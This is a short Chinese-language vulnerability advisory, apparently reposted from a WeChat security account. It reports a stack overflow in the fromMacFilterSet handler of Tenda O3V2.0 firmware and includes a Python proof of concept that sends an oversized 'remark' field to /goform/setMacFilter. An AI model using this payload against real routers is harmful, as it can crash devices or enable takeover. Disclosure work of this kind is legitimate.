受影响的版本
O3V2.0 V1.0.0.10(2478)
漏洞详细信息
O3V2.0 V1.0.0.10(2478)固件中的 函数存在堆栈溢出漏洞fromMacFilterSet,该v25, v28变量接收status, remark来自POST请求的参数,但由于用户可以控制 的输入status, remark,因此该语句sprintf可能导致缓冲区溢出,用户提供的 status, remark可能超出数组的容量v75,从而触发此安全漏洞。
POC:
import requests
ip = "192.168.84.101"
url = "http://" + ip + "/goform/setMacFilter"
payload = b"a"*2000
data = {"mode": "3", "remark": payload}
response = requests.post(url, data=data)
https://github.com/noahze01/IoT-vulnerable/blob/main/Tenda/O3v2.0/fromMacFilterSet.md
原文始发于微信公众号(Ots安全):Tenda O3 中的远程基于堆栈的缓冲区溢出
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论